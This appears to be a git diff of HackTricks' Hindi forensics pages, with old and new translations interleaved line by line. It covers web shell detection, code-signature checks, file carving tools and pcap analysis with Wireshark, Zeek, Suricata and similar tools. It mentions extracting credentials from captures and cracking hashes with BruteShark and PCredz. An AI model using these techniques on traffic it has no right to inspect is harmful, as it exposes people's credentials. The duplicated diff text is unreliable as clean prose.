[**NeoPI** ](https://github.com/CiscoCXSecurity/NeoPI) एक Python स्क्रिप्ट है जो **सांख्यिकीय विधियों** का उपयोग करके **छिपे हुए** और **एन्क्रिप्टेड** सामग्री की खोज करने के लिए है। NeoPI का उद्देश्य **छिपी वेब शैल कोड** की **खोज** में सहायता करना है। [**NeoPI** ](https://github.com/CiscoCXSecurity/NeoPI) एक Python script है जो **statistical methods** का उपयोग करके **obfuscated** और **encrypted** content को text/script files में खोजने के लिए है। NeoPI का उद्देश्य **hidden web shell code** की **detection** में सहायता करना है।
### **php-malware-finder** ### **php-malware-finder**
[**PHP-malware-finder**](https://github.com/nbs-system/php-malware-finder) अपनी सर्वोत्तम प्रयास करता है कि **छिपे हुए**/**अविश्वसनीय कोड** को खोजें जैसे कि फ़ाइलें जो **मैलवेयर**/वेबशैल में अक्सर उपयोग की जाने वाली **PHP** फ़ंक्शन्स का उपयोग कर रही हों। [**PHP-malware-finder**](https://github.com/nbs-system/php-malware-finder) अपनी सर्वोत्तम प्रयास करता है कि **obfuscated**/**dodgy code** और फ़ाइलें खोजें जो **malwares**/webshells में अक्सर उपयोग की जाने वाली **PHP** functions का उपयोग करती हैं।
### Apple Binary Signatures ### Apple Binary Signatures
किसी **मैलवेयर नमूने** की जांच करते समय आपको हमेशा बाइनरी के **सिग्नेचर** की जांच करनी चाहिए क्योंकि उस **डेवलपर** को जिसने इसे साइन किया हो, पहले से ही **मैलवेयर** से **संबंधित** हो सकता है किसी **malware sample** की जांच करते समय आपको हमेशा बाइनरी के **signature** की जांच करनी चाहिए क्योंकि उस **developer** को जिसने इसे **sign** किया हो संबंधित हो सकता है **malware** के साथ
```bash ```bash
#Get signer #Get signer
codesign -vv -d /bin/ls 2>&1 | grep -E "Authority|TeamIdentifier" codesign -vv -d /bin/ls 2>&1 | grep -E "Authority|TeamIdentifier"
@ -149,16 +150,16 @@ codesign --verify --verbose /Applications/Safari.app
#Check if the signature is valid #Check if the signature is valid
spctl --assess --verbose /Applications/Safari.app spctl --assess --verbose /Applications/Safari.app
``` ```
## पहचान तकनीकें ## डिटेक्शन तकनीक
### फ़ाइल स्टैकिंग ### फ़ाइल स्टैकिंग
अगर आपको पता है कि किसी वेब सर्वर के **फ़ाइलें** की एक फ़ोल्डर **कोई निश्चित तारीख** को **अपडेट किया गया था****जांचें** कि **वेब सर्वर की सभी फ़ाइलें कब बनाई और संशोधित** की गई थीं और यदि कोई तारीख **संदिग्ध** है, तो उस फ़ाइल की जांच करें। अगर आपको पता है कि किसी वेब सर्वर के **फ़ाइलें** की किसी तारीख को **अंतिम बार अपडेट हुई थी****जांचें** कि **वेब सर्वर में सभी फ़ाइलें कब बनाई और संशोधित की गई थीं** और यदि कोई तारीख **संदिग्ध** है, तो उस फ़ाइल की जांच करें।
### बेसलाइन्स ### बेसलाइन्स
अगर किसी फ़ोल्डर की फ़ाइलें **संशोधित नहीं होनी चाहिए**, तो आप फ़ोल्डर की **मौलिक फ़ाइलों** का **हैश** निकाल सकते हैं और उन्हें **वर्तमान** वालों के साथ **तुलना** कर सकते हैं। कुछ भी संशोधित होने पर **संदिग्ध** होगा। अगर किसी फ़ोल्डर की फ़ाइलें **संशोधित नहीं होनी चाहिए**, तो आप फ़ोल्डर की **मौलिक फ़ाइलों** का **हैश** निकाल सकते हैं और उन्हें **वर्तमान** फ़ाइलों के साथ **तुलना** कर सकते हैं। कुछ भी संशोधित होने पर **संदिग्ध** होगा।
### सांख्यिकीय विश्लेषण ### सांख्यिकीय विश्लेषण
जब जानकारी लॉग में सहेजी जाती है तो आप **जांच सकते हैं कि वेब सर्वर की प्रत्येक फ़ाइल का कितनी बार एक्सेस किया गया था क्योंकि एक वेब शैल में एक** शामिल हो सकता है जब जानकारी लॉग में सहेजी जाती है तो आप **जांच सकते हैं कि वेब सर्वर की प्रत्येक फ़ाइल का कितनी बार एक्सेस किया गया था क्योंकि एक वेब शैल में सबसे अधिक हो सकता है**

View file

@ -1,29 +1,28 @@
{% hint style="success" %}
एडब्ल्यूएस हैकिंग सीखें और अभ्यास करें: <img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण AWS रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
जीसीपी हैकिंग सीखें और अभ्यास करें: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण GCP रेड टीम एक्सपर्ट (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details> <details>
<summary><strong>जानें AWS हैकिंग को शून्य से हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary> <summary>हैकट्रिक्स का समर्थन करें</summary>
HackTricks का समर्थन करने के अन्य तरीके: * [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें!
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर फॉलो** करें।
* यदि आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहते हैं** तो [**सदस्यता योजनाएं देखें**](https://github.com/sponsors/carlospolop)! * **हैकिंग ट्रिक्स साझा करें, हैकट्रिक्स** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में पीआर जमा करके।
* [**आधिकारिक PEASS और HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह [**The PEASS Family**](https://opensea.io/collection/the-peass-family) खोजें
* **शामिल हों** 💬 [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** पर फॉलो** करें।
* **अपने हैकिंग ट्रिक्स साझा करें, HackTricks** और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks) github repos में PRs सबमिट करके।
</details> </details>
{% endhint %}
# खुदाई उपकरण # कार्विंग टूल्स
## Autopsy ## Autopsy
जांच में सबसे आम उपकरण जो छवियों से फ़ाइलें निकालने के लिए उपयोग किया जाता है [**Autopsy**](https://www.autopsy.com/download/) है। इसे डाउनलोड करें, स्थापित करें और फ़ाइल को इंजेस्ट करने के लिए इसे बनाएं "छिपी" फ़ाइलें खोजने के लिए। ध्यान दें कि Autopsy को डिस्क छवियों और अन्य प्रकार की छवियों का समर्थन करने के लिए बनाया गया है, लेकिन साधारण फ़ाइलों का नहीं। फोरेंसिक्स में सबसे आम उपयोग किया जाने वाला टूल [**Autopsy**](https://www.autopsy.com/download/) है। इसे डाउनलोड करें, इंस्टॉल करें और फ़ाइल को इंजेस्ट करने के लिए इसका उपयोग करें ताकि "छिपी" फ़ाइलें मिल सकें। ध्यान दें कि Autopsy को डिस्क इमेज और अन्य प्रकार की इमेज का समर्थन करने के लिए बनाया गया है, लेकिन साधारण फ़ाइलों का समर्थन नहीं किया गया है
## Binwalk <a id="binwalk"></a> ## Binwalk <a id="binwalk"></a>
**Binwalk** एक उपकरण है जो छवियों और ऑडियो फ़ाइलों जैसी बाइनरी फ़ाइलों को खोजने के लिए है जिसमें एम्बेडेड फ़ाइलें और डेटा होता है। **Binwalk** एक टूल है जो इमेज और ऑडियो फ़ाइलों जैसे बाइनरी फ़ाइलों में छिपी फ़ाइलें और डेटा की खोज के लिए उपयोग किया जाता है। इसे `apt` के साथ इंस्टॉल किया जा सकता है हालांकि [स्रोत](https://github.com/ReFirmLabs/binwalk) github पर उपलब्ध है। **उपयोगी कमांड**:
इसे `apt` के साथ स्थापित किया जा सकता है हालांकि [स्रोत](https://github.com/ReFirmLabs/binwalk) github पर मिल सकता है।
**उपयोगी कमांड**:
```bash ```bash
sudo apt install binwalk #Insllation sudo apt install binwalk #Insllation
binwalk file #Displays the embedded data in the given file binwalk file #Displays the embedded data in the given file
@ -32,15 +31,15 @@ binwalk --dd ".*" file #Displays and extracts all files from the given file
``` ```
## Foremost ## Foremost
छिप फ़ाइलें खोजने के लिए एक और सामान्य उपकरण है **foremost**। आप foremost का विन्यास फ़ाइल `/etc/foremost.conf` में पा सकते हैं। यदि आप कुछ विशिष्ट फ़ाइलें खोजना चाहते हैं तो उन्हें uncomment करें। यदि आप कुछ uncomment नहीं करते हैं तो foremost अपने डिफ़ॉल्ट विन्यासित फ़ाइल प्रकारों के लिए खोज करेगा। छिपी हुई फ़ाइलें खोजने के लिए एक और सामान्य उपकरण है **foremost**। आप foremost का विन्यास फ़ाइल `/etc/foremost.conf` में पा सकते हैं। यदि आप कुछ विशिष्ट फ़ाइलें खोजना चाहते हैं तो उन्हें uncomment करें। यदि आप कुछ uncomment नहीं करते हैं तो foremost अपने डिफ़ॉल्ट विन्यस्त फ़ाइल प्रकारों के लिए खोज करेगा।
```bash ```bash
sudo apt-get install foremost sudo apt-get install foremost
foremost -v -i file.img -o output foremost -v -i file.img -o output
#Discovered files will appear inside the folder "output" #Discovered files will appear inside the folder "output"
``` ```
## **Scalpel** ## **स्कैल्पल**
**Scalpel** एक और उपकरण है जिसका उपयोग **एक फ़ाइल में एम्बेड किए गए फ़ाइलें खोजने और निकालने** के लिए किया जा सकता है। इस मामले में, आपको उसे निकालने के लिए फ़ाइल प्रकारों को कॉन्फ़िगरेशन फ़ाइल \(_/etc/scalpel/scalpel.conf_\) से uncomment करने की आवश्यकता होगी **स्कैल्पल** एक और उपकरण है जिसका उपयोग **एक फ़ाइल में एम्बेड किए गए फ़ाइलें खोजने और निकालने** के लिए किया जा सकता है। इस मामले में, आपको उसे निकालना चाहिए जिसे आप विन्यास फ़ाइल \(_/etc/scalpel/scalpel.conf_\) से अनटिक करना चाहेंगे
```bash ```bash
sudo apt-get install scalpel sudo apt-get install scalpel
scalpel file.img -o output scalpel file.img -o output
@ -53,13 +52,13 @@ scalpel file.img -o output
```text ```text
bulk_extractor memory.img -o out_folder bulk_extractor memory.img -o out_folder
``` ```
Navigate through **सभी जानकारी** जो उपकरण ने इकट्ठा की है \(पासवर्ड?\), **डाटा पैकेट** का **विश्लेषण** करें \(पढ़ें [**Pcaps विश्लेषण**](../pcap-inspection/)\), **अजीब डोमेन** की खोज करें \(मैलवेयर से संबंधित या **अस्तित्व में न होने वाले** डोमेन\). Navigate through **सभी जानकारी** जो उपकरण ने इकट्ठा की है \(पासवर्ड?\), **विश्लेषित** करें **पैकेट्स** \(पढ़ें [**Pcaps विश्लेषण**](../pcap-inspection/)\), **अजीब डोमेन** खोजें \(मैलवेयर से संबंधित या **अस्तित्वहीन**\).
## PhotoRec ## PhotoRec
आप इसे [https://www.cgsecurity.org/wiki/TestDisk\_Download](https://www.cgsecurity.org/wiki/TestDisk_Download) में पा सकते हैं। आप इसे [https://www.cgsecurity.org/wiki/TestDisk\_Download](https://www.cgsecurity.org/wiki/TestDisk_Download) में पा सकते हैं।
यह GUI और CLI संस्करण के साथ आता है। आप फाइल-प्रकार चुन सकते हैं जिनकी खोज के लिए PhotoRec को। यह GUI और CLI संस्करण के साथ आता है। आप चुन सकते हैं **फ़ाइल-प्रकार** जिनकी खोज के लिए PhotoRec को खोजना है
![](../../../.gitbook/assets/image%20%28524%29.png) ![](../../../.gitbook/assets/image%20%28524%29.png)
@ -67,10 +66,11 @@ Navigate through **सभी जानकारी** जो उपकरण न
## FindAES ## FindAES
अपने की स्थिति खोजने के लिए AES कुंजियों की खोज करता है उनकी कुंजी अनुसूचियों की खोज करके। 128, 192, और 256 बिट कुंजियों को खोजने में सक्षम है, जैसे कि TrueCrypt और BitLocker द्वारा उपयोग की गई कुंजियाँ अपने कुंजी अनुसूचियों की खोज करके AES कुंजियों की खोज करता है। 128, 192, और 256 बिट कुंजियों को खोजने में सक्षम है, जैसे जो TrueCrypt और BitLocker द्वारा उपयोग की जाती हैं
यहाँ से डाउनलोड करें [here](https://sourceforge.net/projects/findaes/). यहाँ [डाउनलोड करें](https://sourceforge.net/projects/findaes/).
# पूरक उपकरण # पूरक उपकरण
आप [**viu** ](https://github.com/atanunq/viu)का उपयोग कर सकते हैं छवियों को देखने के लिए टर्मिनल से। आप लिनक्स कमांड लाइन उपकरण **pdftotext** का उपयोग कर सकते हैं एक पीडीएफ को पाठ में बदलने और पढ़ने के लिए। आप [**viu** ](https://github.com/atanunq/viu)का उपयोग कर सकते हैं ताकि आप छवियों को टर्मिनल से देख सकें।
आप लिनक्स कमांड लाइन उपकरण **pdftotext** का उपयोग करके एक पीडीएफ को पाठ में रूपांतरित करने और पढ़ने के लिए कर सकते हैं।

View file

@ -1,33 +1,34 @@
# Pcap Inspection # Pcap Inspection
{% hint style="success" %}
सीखें और प्रैक्टिस करें AWS हैकिंग:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण AWS रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
सीखें और प्रैक्टिस करें GCP हैकिंग: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण GCP रेड टीम एक्सपर्ट (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details> <details>
<summary><strong>जानें AWS हैकिंग को शून्य से हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong> के साथ!</strong></summary> <summary>हैकट्रिक्स का समर्थन करें</summary>
HackTricks का समर्थन करने के अन्य तरीके: * [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें!
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर फॉलो** करें।
* अगर आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहते हैं** तो [**सब्सक्रिप्शन प्लान्स देखें**](https://github.com/sponsors/carlospolop)! * **हैकिंग ट्रिक्स साझा करें, हैकट्रिक्स**](https://github.com/carlospolop/hacktricks) **और हैकट्रिक्स क्लाउड**](https://github.com/carlospolop/hacktricks-cloud) **github रेपो में PR जमा करके।
* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) कलेक्शन **The PEASS Family** की खोज करें
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) और **हमें** **ट्विटर** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** पर फॉलो** करें।
* **हैकिंग ट्रिक्स साझा करें** द्वारा **PRs सबमिट** करके [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में।
</details> </details>
{% endhint %}
<figure><img src="https://files.gitbook.com/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-L_2uGJGU7AVNRcqRvEi%2Fuploads%2FelPCTwoecVdnsfjxCZtN%2Fimage.png?alt=media&#x26;token=9ee4ff3e-92dc-471c-abfe-1c25e446a6ed" alt=""><figcaption></figcaption></figure> <figure><img src="https://files.gitbook.com/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-L_2uGJGU7AVNRcqRvEi%2Fuploads%2FelPCTwoecVdnsfjxCZtN%2Fimage.png?alt=media&#x26;token=9ee4ff3e-92dc-471c-abfe-1c25e446a6ed" alt=""><figcaption></figcaption></figure>
[**RootedCON**](https://www.rootedcon.com/) **स्पेन** में सबसे महत्वपूर्ण साइबर सुरक्षा घटना है और **यूरोप** में सबसे महत्वपूर्ण में से एक है। **तकनीकी ज्ञान को बढ़ावा देने** के मिशन के साथ, यह कांग्रेस प्रौद्योगिकी और साइबर सुरक्षा विशेषज्ञों के लिए एक उबाऊ मिलन स्थल है। [**RootedCON**](https://www.rootedcon.com/) **स्पेन** में सबसे महत्वपूर्ण साइबर सुरक्षा घटना है और यूरोप में सबसे महत्वपूर्ण में से एक है। **तकनीकी ज्ञान को बढ़ावा देने** के मिशन के साथ, यह कांग्रेस प्रौद्योगिकी और साइबर सुरक्षा विशेषज्ञों के लिए एक उबाऊ मिलन स्थल है।
{% embed url="https://www.rootedcon.com/" %} {% embed url="https://www.rootedcon.com/" %}
{% hint style="info" %} {% hint style="info" %}
**PCAP** बनाम **PCAPNG** के बारे में एक नोट: PCAP फ़ाइल प्रारूप के दो संस्करण हैं; **PCAPNG नया है और सभी उपकरणों द्वारा समर्थित नहीं है**। कुछ अन्य उपकरणों में इसके साथ काम करने के लिए आपको एक फ़ाइल को Wireshark या किसी अन्य संगत उपकरण का उपयोग करके PCAP से PCAPNG में परिवर्तित करने की आवश्यकता हो सकती है **PCAP** vs **PCAPNG** के बारे में एक नोट: PCAP फ़ाइल प्रारूप के दो संस्करण हैं; **PCAPNG नया है और सभी उपकरणों द्वारा समर्थित नहीं है**। कुछ अन्य उपकरणों में इसके साथ काम करने के लिए आपको एक फ़ाइल को PCAP से PCAPNG में रूपांतरित करने की आवश्यकता हो सकती है, Wireshark या किसी अन्य संगत उपकरण का उपयोग करके।
{% endhint %} {% endhint %}
## Pcap के लिए ऑनलाइन उपकरण ## Pcap के लिए ऑनलाइन उपकरण
* यदि आपके pcap का हेडर **टूटा हुआ** है तो आपको इसे ठीक करने के लिए यह आजमाना चाहिए: [http://f00l.de/hacking/**pcapfix.php**](http://f00l.de/hacking/pcapfix.php) * यदि आपके pcap का हेडर **टूटा** हुआ है तो आपको इसे ठीक करने की कोशिश करनी चाहिए: [http://f00l.de/hacking/**pcapfix.php**](http://f00l.de/hacking/pcapfix.php)
* [**PacketTotal**](https://packettotal.com) में pcap में **जानकारी** और **मैलवेयर** खोजें * [**PacketTotal**](https://packettotal.com) में pcap में **जानकारी** निकालें और **मैलवेयर** खोजें
* [**www.virustotal.com**](https://www.virustotal.com) और [**www.hybrid-analysis.com**](https://www.hybrid-analysis.com) का उपयोग करके **दुष्ट गतिविधि** खोजें * [**www.virustotal.com**](https://www.virustotal.com) और [**www.hybrid-analysis.com**](https://www.hybrid-analysis.com) का उपयोग करके **दुष्ट गतिविधि** खोजें
## जानकारी निकालें ## जानकारी निकालें
@ -37,7 +38,7 @@ HackTricks का समर्थन करने के अन्य तरी
### Wireshark ### Wireshark
{% hint style="info" %} {% hint style="info" %}
**यदि आप एक PCAP का विश्लेषण करने जा रहे हैं तो आपको मूल रूप से Wireshark का उपयोग कैसे करना है यह जानना चाहिए** **यदि आप PCAP का विश्लेषण करने जा रहे हैं तो आपको बुनियादी रूप से Wireshark का उपयोग कैसे करना है, इसे जानना चाहिए**
{% endhint %} {% endhint %}
आप Wireshark में कुछ ट्रिक्स यहाँ पा सकते हैं: आप Wireshark में कुछ ट्रिक्स यहाँ पा सकते हैं:
@ -62,27 +63,27 @@ sudo apt-get install xplico
/etc/init.d/apache2 restart /etc/init.d/apache2 restart
/etc/init.d/xplico start /etc/init.d/xplico start
``` ```
पहुँच _**127.0.0.1:9876**_ के साथ पहुँचने के लिए पहुँचकर्ता _**xplico:xplico**_ _**127.0.0.1:9876**_ क्रेडेंशियल के साथ पहुंचें _**xplico:xplico**_
फिर **नया मामला** बनाएं, मामले के अंदर **नई सत्र** बनाएं और **pcap** फ़ाइल **अपलोड** करें। फिर **नया मामला** बनाएं, मामले के अंदर **नई सत्र** बनाएं और **pcap फ़ाइल अपलोड** करें।
### NetworkMiner ### NetworkMiner
Xplico की तरह यह एक उपकरण है जो **pcaps से वस्तुओं का विश्लेषण और निकालना** करने के लिए है। इसका एक मुफ्त संस्करण है जिसे आप [**यहाँ**](https://www.netresec.com/?page=NetworkMiner) से **डाउनलोड** कर सकते हैं। यह **Windows** के साथ काम करता है।\ Xplico की तरह यह एक उपकरण है **pcaps से वस्तुओं का विश्लेषण और निकालने** के लिए। इसका एक मुफ्त संस्करण है जिसे आप [**यहाँ**](https://www.netresec.com/?page=NetworkMiner) से **डाउनलोड** कर सकते हैं। यह **Windows** के साथ काम करता है।\
यह उपकरण भी **पैकेट्स से अन्य जानकारी प्राप्त** करने के लिए उपयोगी है ताकि एक **तेज़ तरीके से** क्या हो रहा था उसे पता चल सके यह उपकरण भी **पैकेट्स से अन्य जानकारी** प्राप्त करने के लिए उपयोगी है ताकि आप एक **तेज़ तरीके से** क्या हो रहा था उसे जान सकें
### NetWitness Investigator ### NetWitness Investigator
आप [**यहाँ से NetWitness Investigator डाउनलोड कर सकते हैं**](https://www.rsa.com/en-us/contact-us/netwitness-investigator-freeware) **(यह Windows में काम करता है)**।\ आप [**यहाँ से NetWitness Investigator डाउनलोड कर सकते हैं**](https://www.rsa.com/en-us/contact-us/netwitness-investigator-freeware) **(यह Windows में काम करता है)**।\
यह एक और उपयोगी उपकरण है जो **पैकेट्स का विश्लेषण** करता है और जानकारी को एक उपयोगी तरीके से **व्यवस्थित करता है** ताकि **अंदर क्या हो रहा है** उसे पता चल सके यह एक और उपयोगी उपकरण है जो **पैकेट्स का विश्लेषण** करता है और जानकारी को एक उपयोगी तरीके से **व्यवस्थित करता है** ताकि आप यह जान सकें कि अंदर क्या हो रहा है
### [BruteShark](https://github.com/odedshimon/BruteShark) ### [BruteShark](https://github.com/odedshimon/BruteShark)
* उपयोगकर्ता नाम और पासवर्ड (HTTP, FTP, Telnet, IMAP, SMTP...) को निकालना और एन्कोड करना * उपयोगकर्ता नाम और पासवर्ड को निकालना और एन्कोड करना (HTTP, FTP, Telnet, IMAP, SMTP...)
* प्रमाणीकरण हैश निकालना और Hashcat का उपयोग करके उन्हें क्रैक करना (Kerberos, NTLM, CRAM-MD5, HTTP-Digest...) * प्रमाणीकरण हैश निकालना और Hashcat का उपयोग करके उन्हें क्रैक करना (Kerberos, NTLM, CRAM-MD5, HTTP-Digest...)
* एक दृश्यात्मक नेटवर्क आरेखित करना (नेटवर्क नोड्स और उपयोगकर्ता) * एक विजुअल नेटवर्क आरेखित करना (नेटवर्क नोड्स और उपयोगकर्ता)
* DNS पूछताछ निकालना * DNS क्वेरी निकालना
* सभी TCP और UDP सत्रों का पुनर्निर्माण करना * सभी TCP और UDP सत्र पुनर्निर्माण करना
* फ़ाइल कार्विंग * फ़ाइल कार्विंग
### Capinfos ### Capinfos
@ -91,7 +92,7 @@ capinfos capture.pcap
``` ```
### Ngrep ### Ngrep
यदि आप pcap के अंदर कुछ ढूंढ़ रहे हैं तो आप **ngrep** का उपयोग कर सकते हैं। यहाँ मुख्य फ़िल्टर्स का उपयोग करके एक उदाहरण है: यदि आप pcap के अंदर कुछ **खोज** रहे हैं तो आप **ngrep** का उपयोग कर सकते हैं। यहाँ मुख्य फ़िल्टर्स का उपयोग करके एक उदाहरण है:
```bash ```bash
ngrep -I packets.pcap "^GET" "port 80 and tcp and host 192.168 and dst host 192.168 and src host 192.168" ngrep -I packets.pcap "^GET" "port 80 and tcp and host 192.168 and dst host 192.168 and src host 192.168"
``` ```
@ -103,7 +104,7 @@ ngrep -I packets.pcap "^GET" "port 80 and tcp and host 192.168 and dst host 192.
[file-data-carving-recovery-tools.md](../partitions-file-systems-carving/file-data-carving-recovery-tools.md) [file-data-carving-recovery-tools.md](../partitions-file-systems-carving/file-data-carving-recovery-tools.md)
{% endcontent-ref %} {% endcontent-ref %}
### क्रेडेंशियल कैप्चर ### क्रेडेंशियल कैप्चरिंग
आप [https://github.com/lgandx/PCredz](https://github.com/lgandx/PCredz) जैसे उपकरणों का उपयोग कर सकते हैं ताकि आप pcap या लाइव इंटरफेस से क्रेडेंशियल को पार्स कर सकें। आप [https://github.com/lgandx/PCredz](https://github.com/lgandx/PCredz) जैसे उपकरणों का उपयोग कर सकते हैं ताकि आप pcap या लाइव इंटरफेस से क्रेडेंशियल को पार्स कर सकें।
@ -113,18 +114,18 @@ ngrep -I packets.pcap "^GET" "port 80 and tcp and host 192.168 and dst host 192.
{% embed url="https://www.rootedcon.com/" %} {% embed url="https://www.rootedcon.com/" %}
## जांच करें Exploits/Malware ## जांच एक्सप्लॉइट्स/मैलवेयर
### Suricata ### Suricata
**स्थापित और सेटअप** **स्थापित करें और सेटअप**
``` ```
apt-get install suricata apt-get install suricata
apt-get install oinkmaster apt-get install oinkmaster
echo "url = http://rules.emergingthreats.net/open/suricata/emerging.rules.tar.gz" >> /etc/oinkmaster.conf echo "url = http://rules.emergingthreats.net/open/suricata/emerging.rules.tar.gz" >> /etc/oinkmaster.conf
oinkmaster -C /etc/oinkmaster.conf -o /etc/suricata/rules oinkmaster -C /etc/oinkmaster.conf -o /etc/suricata/rules
``` ```
**पीकैप जाचें** **पीकैप जाचें**
``` ```
suricata -r packets.pcap -c /etc/suricata/suricata.yaml -k none -v -l log suricata -r packets.pcap -c /etc/suricata/suricata.yaml -k none -v -l log
``` ```
@ -132,8 +133,8 @@ suricata -r packets.pcap -c /etc/suricata/suricata.yaml -k none -v -l log
[**YaraPCAP**](https://github.com/kevthehermit/YaraPcap) एक टूल है जो [**YaraPCAP**](https://github.com/kevthehermit/YaraPcap) एक टूल है जो
* एक PCAP फ़ाइल पढ़ता है और Http स्ट्रीम्स निकालता है। * एक PCAP फ़ाइल पढ़ता है और Http स्ट्रीम निकालता है।
* किसी भी संपीडित स्ट्रीम को gzip डिफ़्लेट करता है * किसी भी संपीडित स्ट्रीम को gzip डिफ़्लेट करता है
* हर फ़ाइल को यारा के साथ स्कैन करता है * हर फ़ाइल को यारा के साथ स्कैन करता है
* रिपोर्ट.txt लिखता है * रिपोर्ट.txt लिखता है
* वैकल्पिक रूप से मिलने वाली फ़ाइलों को एक डिर में सहेजता है * वैकल्पिक रूप से मिलने वाली फ़ाइलों को एक डिर में सहेजता है
@ -148,9 +149,9 @@ suricata -r packets.pcap -c /etc/suricata/suricata.yaml -k none -v -l log
## Zeek ## Zeek
> [Zeek](https://docs.zeek.org/en/master/about.html) एक पैसिव, ओपन-सोर्स नेटवर्क ट्रैफ़िक विश्लेषक है। कई ऑपरेटर्स संदेहात्मक या दुराचार गतिविधि की जांच का समर्थन करने के लिए Zeek का उपयोग नेटवर्क सुरक्षा मॉनिटर (NSM) के रूप में करते हैं। Zeek इसके अलावा सुरक्षा डोमेन के पार एक व्यापक ट्रैफ़िक विश्लेषण कार्यों का समर्थन भी करता है, जिसमें प्रदर्शन मापन और समस्या सुलझाने जैसे कार्य शामिल हैं > [Zeek](https://docs.zeek.org/en/master/about.html) एक पैसिव, ओपन-सोर्स नेटवर्क ट्रैफ़िक विश्लेषक है। कई ऑपरेटर संदेहपूर्ण या दुष्ट गतिविधि की जांच का समर्थन करने के लिए Zeek का उपयोग नेटवर्क सुरक्षा मॉनिटर (NSM) के रूप में करते हैं। Zeek नेटवर्क सुरक्षा डोमेन के अलावा एक व्यापक ट्रैफ़िक विश्लेषण कार्यों का समर्थन भी करता है, जिसमें प्रदर्शन मापन और ट्रबलशूटिंग शामिल है
मूल रूप से, `zeek` द्वारा बनाए गए लॉग **पीकैप्स** नहीं हैं। इसलिए आपको लॉग का विश्लेषण करने के लिए **अन्य उपकरण** का उपयोग करना होगा जहां **जानकारी** पीकैप्स के बारे में होती है मूल रूप से, `zeek` द्वारा बनाए गए लॉग **पीकैप्स** नहीं हैं। इसलिए आपको लॉग विश्लेषित करने के लिए **अन्य उपकरण** का उपयोग करना होगा जहां **पीकैप्स** के बारे में **जानकारी** हो
### कनेक्शन जानकारी ### कनेक्शन जानकारी
```bash ```bash
@ -237,20 +238,21 @@ rita show-exploded-dns -H --limit 10 zeek_logs
<figure><img src="https://files.gitbook.com/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-L_2uGJGU7AVNRcqRvEi%2Fuploads%2FelPCTwoecVdnsfjxCZtN%2Fimage.png?alt=media&#x26;token=9ee4ff3e-92dc-471c-abfe-1c25e446a6ed" alt=""><figcaption></figcaption></figure> <figure><img src="https://files.gitbook.com/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-L_2uGJGU7AVNRcqRvEi%2Fuploads%2FelPCTwoecVdnsfjxCZtN%2Fimage.png?alt=media&#x26;token=9ee4ff3e-92dc-471c-abfe-1c25e446a6ed" alt=""><figcaption></figcaption></figure>
[**RootedCON**](https://www.rootedcon.com/) स्पेन में सबसे महत्वपूर्ण साइबर सुरक्षा घटना है और यूरोप में सबसे महत्वपूर्ण में से एक है। **तकनीकी ज्ञान को बढ़ावा देने** के मिशन के साथ, यह कांग्रेस प्रौद्योगिकी और साइबर सुरक्षा विशेषज्ञों के लिए एक उबाऊ मिलन स्थल है। [**RootedCON**](https://www.rootedcon.com/) स्पेन में सबसे महत्वपूर्ण साइबर सुरक्षा घटना है और यूरोप में सबसे महत्वपूर्ण में से एक है। **तकनीकी ज्ञान को बढ़ावा देने** के मिशन के साथ, यह कांग्रेस प्रौद्योगिकी और साइबर सुरक्षा विशेषज्ञों के लिए एक उफान मिलने का समारोह है।
{% embed url="https://www.rootedcon.com/" %} {% embed url="https://www.rootedcon.com/" %}
{% hint style="success" %}
